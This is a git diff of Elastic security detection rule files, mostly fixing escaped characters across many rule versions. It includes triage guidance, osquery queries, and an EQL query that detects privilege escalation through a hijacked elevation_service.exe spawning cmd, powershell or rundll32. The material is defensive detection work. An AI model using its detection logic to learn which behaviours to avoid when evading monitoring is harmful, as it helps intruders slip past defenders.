Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Look for additional processes spawned by the process, command lines, and network communications.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Verify whether a digital signature exists in the executable, and if it is valid.\n\n### Related rules\n\n- Suspicious DLL Loaded for Persistence or Privilege Escalation - bfeaf89b-a2a7-48a3-817f-e41829dc61ee\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name : \"System\" and\n (\n (process.name : \"elevation_service.exe\" and\n not process.pe.original_file_name == \"elevation_service.exe\") or\n \n (process.name : \"elevation_service.exe\" and\n not process.code_signature.trusted == true) or\n\n (process.parent.name : \"elevation_service.exe\" and\n process.name : (\"rundll32.exe\", \"cmd.exe\", \"powershell.exe\"))\n ) and\n not\n (\n process.name : \"elevation_service.exe\" and process.code_signature.trusted == true and\n process.pe.original_file_name == null\n )\n",
 "references": [
 "https://github.com/klinix5/InstallerFileTakeOver" 
@@ -61,7 +61,7 @@
 ],
 "risk_score": 73,
 "rule_id": "58c6d58b-a0d3-412d-b3b8-0981a9400607",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_1.json b/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_1.json
index 29d9e21bf74..57e39f22856 100644
--- a/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_1.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_2.json b/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_2.json
index 301c6e85a5c..6dda16bd3d3 100644
--- a/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/5919988c-29e1-4908-83aa-1f087a838f63_2.json
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_101.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_101.json
index 65b9f15c492..2c4d4b7339b 100644
--- a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_101.json
@@ -18,7 +18,7 @@
 "note": "",
 "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n",
 "references": [
- "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us\u0026rs=en-us\u0026ad=us"
+ "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us"
 ],
 "related_integrations": [
 {
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access", 
diff --git a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_102.json b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_102.json
index 61acf69c718..05ba3cbcfef 100644
--- a/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/5930658c-2107-4afc-91af-e0e55b7f7184_102.json
@@ -18,7 +18,7 @@
 "note": "",
 "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.action:AlertTriggered and rule.name:\"Email reported by user as malware or phish\"\n",
 "references": [
- "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us\u0026rs=en-us\u0026ad=us"
+ "https://support.microsoft.com/en-us/office/use-the-report-message-add-in-b5caa9f1-cdf3-4443-af8c-ff724ea719d2?ui=en-us&rs=en-us&ad=us"
 ],
 "related_integrations": [
 {
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_103.json b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_103.json
index 8d2807b66f0..21b79b30824 100644
--- a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_103.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection", 
diff --git a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_104.json b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_104.json
index 1f1a5b31c3c..238ff165b53 100644
--- a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_104.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_105.json b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_105.json
index 0980b961dcb..5a9888b6709 100644
--- a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_105.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection",
diff --git a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_206.json b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_206.json
index b1765d4830e..013b3d73825 100644
--- a/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/594e0cbf-86cc-45aa-9ff7-ff27db27d3ed_206.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0009",
 "name": "Collection", 
diff --git a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_101.json b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_101.json
index 3aa81ca90bb..271414d1507 100644
--- a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_101.json
@@ -29,7 +29,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_102.json b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_102.json
index cafa4207ca2..fabf61f0e46 100644
--- a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_102.json
@@ -29,7 +29,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_103.json b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_103.json
index fd79691d6cb..102651579cc 100644
--- a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_103.json
@@ -28,7 +28,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery", 
diff --git a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_104.json b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_104.json
index 21a7ba64e07..dbbd497699f 100644
--- a/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/59756272-1998-4b8c-be14-e287035c4d10_104.json
@@ -38,7 +38,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_103.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_103.json
index 4994d7460bc..22ba06e30a9 100644
--- a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_103.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic", 
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_104.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_104.json
index 4c384f7c1a7..9edc96f4eb9 100644
--- a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_104.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_105.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_105.json
index 67e2353494f..15e2a539c1e 100644
--- a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_105.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_106.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_106.json
index fdf8b1d61d7..ca3b94aeed1 100644
--- a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_106.json 
@@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_107.json b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_107.json index f11b8ee7952..157e8818b04 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/5a14d01d-7ac8-4545-914c-b687c2cf66b3_107.json 
@@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_1.json b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_1.json index 39a35e87d2e..fa62f637b13 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_1.json 
@@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_2.json b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_2.json index 39ba4e90335..1a459cadcd7 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_2.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_3.json b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_3.json index a46d0bb7b03..bc298ea9bac 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_3.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", 
diff --git a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_4.json b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_4.json index c81818e962a..106a6258f38 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_4.json @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_5.json b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_5.json index dfe248ee3b9..af37ac81867 100644 --- a/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_5.json +++ b/packages/security_detection_engine/kibana/security_rule/5a3d5447-31c9-409a-aed1-72f9921594fd_5.json @@ -86,7 +86,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -108,7 +108,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_102.json b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_102.json index 8c1b7dfd2b9..31fc55fadea 100644 --- a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_102.json 
+++ b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_102.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_103.json b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_103.json index 495bb45310a..55ecf2065fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_103.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_104.json b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_104.json index 91498043907..0ac8d62006d 100644 --- a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_104.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_105.json b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_105.json index 4e670faae6d..75cbdac6108 100644 --- a/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_103.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_103.json index 3da5e5cb777..07b86170430 100644 --- a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_103.json @@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_104.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_104.json index 7c6130279cb..2165fc5bee4 100644 
